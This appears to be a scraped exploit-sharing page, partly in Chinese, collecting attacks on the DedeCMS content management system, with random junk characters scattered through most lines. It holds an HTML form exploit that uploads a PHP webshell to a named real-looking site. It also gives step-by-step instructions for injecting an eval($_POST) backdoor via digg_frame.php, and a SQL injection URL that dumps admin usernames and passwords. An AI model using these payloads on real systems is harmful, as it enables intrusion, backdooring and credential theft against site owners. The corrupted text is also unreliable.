9 F7 v5 _; ]- p/ `8 _, P</head>! y( a2 c! O( Q% T/ I: k
<body style="FONT-SIZE: 9pt">; F+ S1 S& F( a% \+ v7 X" P8 t
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />, d0 d/ B4 w$ @! h7 a
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>4 |" `1 U4 o3 ^$ ]* c) T; P
<input type='hidden' name='activepath' value='/data/cache/' />+ I) \& v n. o* y/ q- Q, y( \
<input type='hidden' name='cfg_basedir' value='../../' />
1 K) z5 } h! R, H2 c<input type='hidden' name='cfg_imgtype' value='php' />
$ Q( k' G3 l# V, I$ z2 [<input type='hidden' name='cfg_not_allowall' value='txt' />
5 h0 J9 Y4 E6 f j. N9 O' {/ c<input type='hidden' name='cfg_softtype' value='php' />$ }- t. m Z) j. D
<input type='hidden' name='cfg_mediatype' value='php' />
* h8 r" }( y" h. \/ w: R<input type='hidden' name='f' value='form1.enclosure' />
5 W! U6 B7 M$ N+ h<input type='hidden' name='job' value='upload' />
/ ~! c, T: J* j6 m6 [5 u<input type='hidden' name='newname' value='fly.php' />
0 j' U5 d- E0 k; \Select U Shell <input type='file' name='uploadfile' size='25' />
, E# W9 j* }/ o6 O9 F' q: F0 o, E<input type='submit' name='sb1' value='确定' />0 a# B5 l. d H! T% }5 b
</form>
. C/ H: L- w( V! G<br />It's just a exp for the bug of Dedecms V55...<br />; W. N: i) o9 Q( h
Need register_globals = on...<br />
D5 D- K3 w4 KFun the game,get a webshell at /data/cache/fly.php...<br />8 T, Z4 M4 k" m
</body>
: J6 K! L1 W$ C5 a: [</html>
, Q% f' q, U7 A* k/ Y
1 x) C: I$ R) b# l/ C! u9 h; C! G4 _% a2 u6 L1 A
j A# P4 x* c+ D) W; z" A: ^
0 y+ O2 P; Q8 f, P+ _5 M
4 M1 V% m9 Z( O. e+ v) E- |
( r2 ?- W$ k! z. e A) r. s, }# G2 b+ J3 Y# k
+ U5 }; g+ U5 g" X/ \! {8 {- N0 [! r& T) w v
$ g8 ~* F8 @, P4 _, V
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
0 o* w5 m" d& s1 Q5 L# j利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。% @9 v; G& {2 f3 @. O
1. 访问网址:, u: }" N4 v: ?. x+ V0 F1 d
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
- C. ~ R/ y% p4 Y6 u/ {可看见错误信息2 s* t! l4 y7 Q
; A: x: {2 l3 N( O3 B% s% Z
9 P5 S4 r) ^' Q2 X2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。" a- B4 E; U$ U! a: q# L
int(3) Error: Illegal double '1024e1024' value found during parsing
$ P/ {; u) U) W' DError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>: Y t0 p: W: O1 c' f
: s2 ~: K9 J) e c4 C; b
/ e: p" N7 x$ b7 r$ B# [, p S3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是: {6 b0 o6 B" X) y, X
% x5 o4 ?4 v. u* m6 u! C( U1 P! w4 z- _
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
& d9 p$ W& C3 }) f7 ^) N; X2 l1 K8 P. e3 @4 ^
% ~: f8 F" A3 k1 S
按确定后的看到第2步骤的信息表示文件木马上传成功.
9 H$ `' ?+ q! p& f8 P# @) S) a1 s8 g- D$ h0 v
+ m# m1 @& @! o; @7 E# A2 ~# G! s4 [# r
$ P5 b5 ?) r+ [' R& o, h: i% s' v9 s+ C. C: }
1 J$ h, S- P& r! |- P- J( u4 }$ L5 f: @1 b, M
; O( g* l4 F2 J
/ h1 G, X9 C0 \% D0 e" m! G+ S2 a0 S. |; n2 ^7 j) d3 r
( [6 ]% j6 }" U w6 r2 L4 {) B
, h2 e* u+ W. X5 }' ]2 `
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
- B, M- A9 U' U( a. Q% U! v) Mhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|